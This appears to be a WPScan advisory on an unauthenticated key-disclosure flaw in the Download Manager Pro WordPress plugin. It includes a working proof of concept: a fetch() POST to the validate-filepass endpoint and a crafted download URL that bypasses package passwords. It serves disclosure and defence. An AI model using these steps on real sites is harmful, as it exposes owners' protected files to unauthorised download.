WordPress Plugin Vulnerabilities
Download Manager Pro < 6.3.0 - Unauthenticated Sensitive Information Disclosure
Description
The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.
Proof of Concept
- Create a password protected package containing one or more files. - Navigate to the download page of the package (e.g. `/download/package1`) - Inspect the "Download" button beside one of the packaged files. The HTML should look like this: <button class="inddl btn btn-primary btn-sm" data-pid="123" data-file="12345678" rel="https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678" data-pass="#pass_113_1679405558600"> <i class="fa fa-download"></i> Download </button> - Note the `wpdmdl` and `ind` URL parameters for later. - Send a POST request to `/wp-json/wpdm/validate-filepass`: fetch("/wp-json/wpdm/validate-filepass", { "headers": { "accept": "*/*", "content-type": "application/x-www-form-urlencoded; charset=UTF-8", }, "body": "", "method": "POST", "credentials": "include" }).then(response => response.text()).then(text => console.log(text)); - The response will look like the following: {"success":true,"downloadurl":"\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="} - Construct a download URL as follows, using the above `_wpdmkey` parameter, as well as the `wpdmdl` and `ind` parameters from above: https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef - See that the file may be download from that URL, without any knowledge of its password.
Affects Plugins
References
CVE
Classification
Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Johan Kragt
Submitter
Johan Kragt
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-04-10 (about 1 years ago)
Added
2023-04-10 (about 1 years ago)
Last Updated
2023-04-10 (about 1 years ago)